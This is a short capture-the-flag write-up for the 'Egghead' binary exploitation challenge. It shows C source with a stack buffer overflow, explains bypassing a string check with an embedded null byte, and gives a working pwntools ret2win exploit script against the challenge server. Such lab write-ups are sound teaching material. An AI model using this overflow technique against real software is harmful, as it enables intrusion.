274 words
1 minute
Egghead
Write-up of the challenge “Egghead”
This challenge is part of the “Binary exploitation” category and is worth 191 points.
Goal of the challenge
The objective of this challenge is to use the bof to ret2win.
Program structure
#include <stdlib.h>#include <stdio.h>#include <stdint.h>#include <string.h>
#define MAX_ANSWER_LEN 64
void win() { puts("getittwisted:"); FILE *f = fopen("flag", "r"); int c; while ((c = fgetc(f)) != EOF) putchar(c); putchar('\n');}
void name() { char answer[32]; while (1) { puts("Name a movie."); printf("> "); fgets(answer, MAX_ANSWER_LEN, stdin); answer[strcspn(answer, "\n")] = '\0'; if (strcmp(answer, "Happy Gilmore") == 0) { puts("Now that's cinema."); return; } puts("Not cinema."); }}
int main() { setbuf(stdin, NULL); setbuf(stdout, NULL); name();}void name(void){ char v0[32]; // [bp-0x28]
while (true) { puts("Name a movie."); printf("> "); fgets(&v0, 64, stdin); v0[strcspn(&v0, "\n")] = 0; if (!strcmp(&v0, "Happy Gilmore")) break; puts("Not cinema."); } puts("Now that's cinema."); return;}Security breach
The secruity breach here is bof:
fgets(&v0, 64, stdin);Solution
So the goal here is clear we need to bypass the first check if (!strcmp(&v0, “Happy Gilmore”)) and then perform ret2win. So how strcspn works by reading till hitting a null byte and we will exactly do that. After that we will continue and overwrite the RIP (0x28 + 8) with the win function and I will make sure to put a ret for stack aligment incase of misaligment!
from pwn import *
# p = process("./egghead")p = remote('egghead-035e0f00c11650a5.instancer.batmans.kitchen', 1337, ssl=True)
e = ELF("egghead")
rop = ROP(e)
ret = rop.find_gadget(["ret"])[0]win = e.sym['win']
offset = 0x28
cinema = b'Happy Gilmore\x00'
payload = cinema + b'A' * (offset - len(cinema)) + p64(ret) + p64(win)
p.sendline(payload)
p.interactive()